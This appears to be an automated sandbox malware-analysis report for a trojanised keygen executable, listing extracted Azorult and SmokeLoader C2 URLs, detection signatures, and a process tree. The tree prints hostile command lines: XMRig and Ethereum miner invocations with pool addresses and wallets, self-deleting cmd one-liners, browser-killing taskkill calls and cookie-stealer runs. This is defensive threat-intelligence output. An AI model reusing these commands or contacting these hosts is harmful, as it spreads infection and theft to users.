Analysis
-
max time kernel
311s -
max time network
349s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
02-04-2021 21:07
Static task
static1
Behavioral task
behavioral1
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win7v20201028
General
-
Target
Easeus.Mobisaver.3.5.key.generator.exe
-
Size
5.4MB
-
MD5
2a2be5dbf78e57ac4fd460faa2a52488
-
SHA1
8e0791500aeb17c4dc950e1a8c90d6036fb49d5b
-
SHA256
b66f057295395c28f1dd0d6807ac2c174885235d63ab3f3ff5b3d87719780228
-
SHA512
8715562e1b9e7c2357f95f3beb66383de7ec16d4dfbf7f0230a922ea420d27378e22ced50ee9d7e0da30a05bf269d5a07ca1a736b1b0828f3afbdfc8c10b9038
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral4/memory/5144-238-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral4/memory/5144-239-0x0000000005100000-0x0000000005A0A000-memory.dmp family_glupteba behavioral4/memory/5144-240-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 6 IoCs
resource yara_rule behavioral4/memory/5400-200-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/5400-183-0x00000001402CA898-mapping.dmp xmrig behavioral4/memory/5400-180-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/5400-249-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/7648-718-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/7648-746-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 8 IoCs
pid Process 1172 keygen-pr.exe 1248 keygen-step-1.exe 640 keygen-step-3.exe 412 keygen-step-4.exe 2164 key.exe 2092 Setup.exe 1032 key.exe 2072 multitimer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 537 ip-api.com 105 api.ipify.org 206 api.ipify.org 309 ipinfo.io 312 ipinfo.io 450 ipinfo.io 522 ipinfo.io 535 ipinfo.io 126 ipinfo.io 129 ipinfo.io 187 ip-api.com 416 api.ipify.org 461 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2164 set thread context of 1032 2164 key.exe 90 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 20 IoCs
pid pid_target Process procid_target 5680 4992 WerFault.exe 151 5856 4992 WerFault.exe 151 5840 4992 WerFault.exe 151 6272 4992 WerFault.exe 151 5068 4992 WerFault.exe 151 5724 4992 WerFault.exe 151 4544 4992 WerFault.exe 151 5056 4392 WerFault.exe 241 6628 4392 WerFault.exe 241 1728 4392 WerFault.exe 241 4432 4392 WerFault.exe 241 4584 4392 WerFault.exe 241 7752 4392 WerFault.exe 241 5728 4392 WerFault.exe 241 8608 1000 WerFault.exe 135 1860 7216 WerFault.exe 395 772 7216 WerFault.exe 395 7292 7216 WerFault.exe 395 3664 7216 WerFault.exe 395 392 7216 WerFault.exe 395 -
Delays execution with timeout.exe 1 IoCs
pid Process 4892 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 4972 taskkill.exe 576 taskkill.exe 4400 taskkill.exe 4188 taskkill.exe -
Runs ping.exe 1 TTPs 6 IoCs
pid Process 9132 PING.EXE 8644 PING.EXE 3904 PING.EXE 4960 PING.EXE 4920 PING.EXE 892 PING.EXE -
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 534 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 539 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 127 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 133 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 311 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 315 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 518 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 523 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2092 Setup.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 1196 wrote to memory of 2632 1196 Easeus.Mobisaver.3.5.key.generator.exe 79 PID 1196 wrote to memory of 2632 1196 Easeus.Mobisaver.3.5.key.generator.exe 79 PID 1196 wrote to memory of 2632 1196 Easeus.Mobisaver.3.5.key.generator.exe 79 PID 2632 wrote to memory of 1172 2632 cmd.exe 82 PID 2632 wrote to memory of 1172 2632 cmd.exe 82 PID 2632 wrote to memory of 1172 2632 cmd.exe 82 PID 2632 wrote to memory of 1248 2632 cmd.exe 83 PID 2632 wrote to memory of 1248 2632 cmd.exe 83 PID 2632 wrote to memory of 1248 2632 cmd.exe 83 PID 2632 wrote to memory of 640 2632 cmd.exe 84 PID 2632 wrote to memory of 640 2632 cmd.exe 84 PID 2632 wrote to memory of 640 2632 cmd.exe 84 PID 2632 wrote to memory of 412 2632 cmd.exe 85 PID 2632 wrote to memory of 412 2632 cmd.exe 85 PID 2632 wrote to memory of 412 2632 cmd.exe 85 PID 1172 wrote to memory of 2164 1172 keygen-pr.exe 86 PID 1172 wrote to memory of 2164 1172 keygen-pr.exe 86 PID 1172 wrote to memory of 2164 1172 keygen-pr.exe 86 PID 412 wrote to memory of 2092 412 keygen-step-4.exe 87 PID 412 wrote to memory of 2092 412 keygen-step-4.exe 87 PID 640 wrote to memory of 3412 640 keygen-step-3.exe 89 PID 640 wrote to memory of 3412 640 keygen-step-3.exe 89 PID 640 wrote to memory of 3412 640 keygen-step-3.exe 89 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 2164 wrote to memory of 1032 2164 key.exe 90 PID 3412 wrote to memory of 3904 3412 cmd.exe 92 PID 3412 wrote to memory of 3904 3412 cmd.exe 92 PID 3412 wrote to memory of 3904 3412 cmd.exe 92 PID 2092 wrote to memory of 2072 2092 Setup.exe 93 PID 2092 wrote to memory of 2072 2092 Setup.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\Easeus.Mobisaver.3.5.key.generator.exe"C:\Users\Admin\AppData\Local\Temp\Easeus.Mobisaver.3.5.key.generator.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:1032
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1248
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:3904
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:412 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Users\Admin\AppData\Local\Temp\WD32LZMUAH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WD32LZMUAH\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\WD32LZMUAH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WD32LZMUAH\multitimer.exe" 1 3.1617397658.6067879a84307 1016⤵PID:4620
-
C:\Users\Admin\AppData\Local\Temp\WD32LZMUAH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WD32LZMUAH\multitimer.exe" 2 3.1617397658.6067879a843077⤵PID:4780
-
C:\Users\Admin\AppData\Local\Temp\5miofkssjag\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\5miofkssjag\KiffApp1.exe"8⤵PID:5064
-
-
C:\Users\Admin\AppData\Local\Temp\xt0a45ig3d2\vict.exe"C:\Users\Admin\AppData\Local\Temp\xt0a45ig3d2\vict.exe" /VERYSILENT /id=5358⤵PID:1736
-
C:\Users\Admin\AppData\Local\Temp\is-KQ473.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-KQ473.tmp\vict.tmp" /SL5="$E0070,870426,780800,C:\Users\Admin\AppData\Local\Temp\xt0a45ig3d2\vict.exe" /VERYSILENT /id=5359⤵PID:5544
-
C:\Users\Admin\AppData\Local\Temp\is-ITT5S.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-ITT5S.tmp\win1host.exe" 53510⤵PID:1000
-
C:\Users\Admin\AppData\Local\Temp\2Kx0q47s8.exe"C:\Users\Admin\AppData\Local\Temp\2Kx0q47s8.exe"11⤵PID:6904
-
C:\Users\Admin\AppData\Local\Temp\2Kx0q47s8.exe"C:\Users\Admin\AppData\Local\Temp\2Kx0q47s8.exe"12⤵PID:4084
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1000 -s 64811⤵
- Program crash
PID:8608
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zfbetqbd3ws\vpn.exe"C:\Users\Admin\AppData\Local\Temp\zfbetqbd3ws\vpn.exe" /silent /subid=4828⤵PID:5348
-
C:\Users\Admin\AppData\Local\Temp\is-R5FNH.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-R5FNH.tmp\vpn.tmp" /SL5="$1501EA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\zfbetqbd3ws\vpn.exe" /silent /subid=4829⤵PID:5564
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:3992
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:6752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:6292
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:5536
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:5272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hvpw5bjczmt\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\hvpw5bjczmt\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5392
-
-
C:\Users\Admin\AppData\Local\Temp\ufsv0fzmtyx\lfbrypqf44t.exe"C:\Users\Admin\AppData\Local\Temp\ufsv0fzmtyx\lfbrypqf44t.exe" /quiet SILENT=1 AF=7568⤵PID:5376
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ufsv0fzmtyx\lfbrypqf44t.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ufsv0fzmtyx\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617138563 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:6708
-
-
-
C:\Users\Admin\AppData\Local\Temp\5wgjfure1ky\app.exe"C:\Users\Admin\AppData\Local\Temp\5wgjfure1ky\app.exe" /8-238⤵PID:5144
-
-
C:\Users\Admin\AppData\Local\Temp\mylgllzi2hp\2rayk3ea1ew.exe"C:\Users\Admin\AppData\Local\Temp\mylgllzi2hp\2rayk3ea1ew.exe" /VERYSILENT8⤵PID:5132
-
-
C:\Users\Admin\AppData\Local\Temp\4qd4uxuliai\dumy3su0uwm.exe"C:\Users\Admin\AppData\Local\Temp\4qd4uxuliai\dumy3su0uwm.exe"8⤵PID:3636
-
-
C:\Users\Admin\AppData\Local\Temp\ssx403y1xc1\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ssx403y1xc1\Setup3310.exe" /Verysilent /subid=5778⤵PID:5000
-
-
C:\Users\Admin\AppData\Local\Temp\yh3px1pcndf\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\yh3px1pcndf\cpyrix.exe" /VERYSILENT8⤵PID:2832
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:4988
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵PID:5252
-
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵PID:6736
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:4348
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵PID:7060
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵PID:7156
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵PID:6924
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1f5ffvcbmhc\xbyqe4tw1ne.exe"C:\Users\Admin\AppData\Local\Temp\1f5ffvcbmhc\xbyqe4tw1ne.exe" /ustwo INSTALL8⤵PID:4992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 6529⤵
- Program crash
PID:5680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 6649⤵
- Program crash
PID:5856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 7009⤵
- Program crash
PID:5840
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 7049⤵
- Program crash
PID:6272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 8849⤵
- Program crash
PID:5068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 6689⤵
- Program crash
PID:5724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 9769⤵
- Program crash
PID:4544
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\HELBASY05P\setups.exe"C:\Users\Admin\AppData\Local\Temp\HELBASY05P\setups.exe" ll5⤵PID:4028
-
C:\Users\Admin\AppData\Local\Temp\is-J88VH.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-J88VH.tmp\setups.tmp" /SL5="$7005E,635399,250368,C:\Users\Admin\AppData\Local\Temp\HELBASY05P\setups.exe" ll6⤵PID:2244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵PID:3980
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:748
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:4188
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"4⤵PID:4716
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4848
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4996
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:4896
-
C:\Users\Admin\AppData\Roaming\CCFA.tmp.exe"C:\Users\Admin\AppData\Roaming\CCFA.tmp.exe"5⤵PID:2892
-
C:\Users\Admin\AppData\Roaming\CCFA.tmp.exe"C:\Users\Admin\AppData\Roaming\CCFA.tmp.exe"6⤵PID:5292
-
-
-
C:\Users\Admin\AppData\Roaming\CFDA.tmp.exe"C:\Users\Admin\AppData\Roaming\CFDA.tmp.exe"5⤵PID:1424
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4872
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5400
-
-
-
C:\Users\Admin\AppData\Roaming\D123.tmp.exe"C:\Users\Admin\AppData\Roaming\D123.tmp.exe"5⤵PID:5040
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\D123.tmp.exe6⤵PID:4160
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:4892
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:5232
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:5712
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵PID:8780
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:7984
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:8936
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4292
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4344
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4664
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4100
-
C:\Users\Admin\AppData\Local\Temp\is-VESLM.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-VESLM.tmp\Setup3310.tmp" /SL5="$3020E,138429,56832,C:\Users\Admin\AppData\Local\Temp\ssx403y1xc1\Setup3310.exe" /Verysilent /subid=5771⤵PID:5420
-
C:\Users\Admin\AppData\Local\Temp\is-3FOF3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3FOF3.tmp\Setup.exe" /Verysilent2⤵PID:5624
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"3⤵PID:4508
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7012
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1796
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"3⤵PID:4308
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵PID:3156
-
C:\Users\Admin\AppData\Local\Temp\is-4Q9QO.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-4Q9QO.tmp\LabPicV3.tmp" /SL5="$20284,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"4⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\is-I8NUK.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-I8NUK.tmp\ppppppfy.exe" /S /UID=lab2145⤵PID:7060
-
C:\Program Files\Windows Defender\JPLIXECWSJ\prolab.exe"C:\Program Files\Windows Defender\JPLIXECWSJ\prolab.exe" /VERYSILENT6⤵PID:6276
-
C:\Users\Admin\AppData\Local\Temp\is-P6PCN.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-P6PCN.tmp\prolab.tmp" /SL5="$20358,575243,216576,C:\Program Files\Windows Defender\JPLIXECWSJ\prolab.exe" /VERYSILENT7⤵PID:5288
-
-
-
C:\Users\Admin\AppData\Local\Temp\fa-592be-b93-192b6-ee466741d731f\Fawobalywi.exe"C:\Users\Admin\AppData\Local\Temp\fa-592be-b93-192b6-ee466741d731f\Fawobalywi.exe"6⤵PID:6248
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\towjz0xk.myy\md6_6ydj.exe & exit7⤵PID:6776
-
C:\Users\Admin\AppData\Local\Temp\towjz0xk.myy\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\towjz0xk.myy\md6_6ydj.exe8⤵PID:5524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pn2bwqen.mce\askinstall31.exe & exit7⤵PID:3024
-
C:\Users\Admin\AppData\Local\Temp\pn2bwqen.mce\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\pn2bwqen.mce\askinstall31.exe8⤵PID:6356
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:5048
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:4972
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\an25cmu5.arf\toolspab1.exe & exit7⤵PID:6960
-
C:\Users\Admin\AppData\Local\Temp\an25cmu5.arf\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\an25cmu5.arf\toolspab1.exe8⤵PID:6856
-
C:\Users\Admin\AppData\Local\Temp\an25cmu5.arf\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\an25cmu5.arf\toolspab1.exe9⤵PID:1044
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vdft0rxh.m3p\setup_10.2_mix.exe & exit7⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\vdft0rxh.m3p\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\vdft0rxh.m3p\setup_10.2_mix.exe8⤵PID:2600
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "9⤵PID:5976
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ze413hrm.0hk\GcleanerWW.exe /mixone & exit7⤵PID:3400
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3kb45wrj.qnv\app.exe /8-2222 & exit7⤵PID:2132
-
